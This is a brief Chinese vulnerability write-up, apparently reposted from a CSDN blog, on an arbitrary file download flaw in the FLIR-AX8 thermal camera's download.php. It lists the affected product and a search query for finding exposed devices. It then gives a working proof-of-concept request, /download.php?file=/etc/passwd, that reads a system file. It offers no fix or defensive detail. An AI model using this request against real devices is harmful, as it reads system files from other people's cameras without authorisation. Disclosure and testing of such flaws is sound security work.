FLIR-AX8 download.php 任意文件下载

漏洞描述

FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞

漏洞影响

FLIR-AX8

网络测绘

app="FLIR-FLIR-AX8"

漏洞复现

登录页面

验证POC

/download.php?file=/etc/passwd

猜你喜欢

转载自blog.csdn.net/qq_17754023/article/details/127706323